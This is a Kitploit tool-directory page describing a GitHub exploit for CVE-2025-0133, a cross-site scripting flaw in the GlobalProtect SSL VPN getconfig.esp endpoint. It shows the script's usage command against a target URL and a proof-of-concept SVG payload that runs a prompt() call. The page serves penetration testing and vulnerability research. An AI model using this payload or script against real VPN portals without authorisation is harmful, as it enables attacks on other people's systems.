Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
-CVE-2025-0133-GlobalProtect-XSS — CVE-2025-0133 GlobalProtect XSS | Kitploit
Tools/GitHubGitHub/ynsmroztas/-cve-2025-0133-globalprotect-xss
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubynsmroztas/-cve-2025-0133-globalprotect-xss

-CVE-2025-0133-GlobalProtect-XSS

CVE-2025-0133 GlobalProtect XSS

View Repository
21321 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

mitsec_vpn_xss_exploit

🔓 Exploit for GlobalProtect SSL VPN endpoint /ssl-vpn/getconfig.esp that appends a crafted XSS payload to the URL.

Usage

root@kitploit:~
python3 exploit.py -u https://target.com

Parameters

  • -u, --url: Base target URL (do not include query params)

Payload Preview

root@kitploit:~
<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>

Author

  • GitHub:
ynsmroztas
  • Twitter: @ynsmroztas
  • Download Tool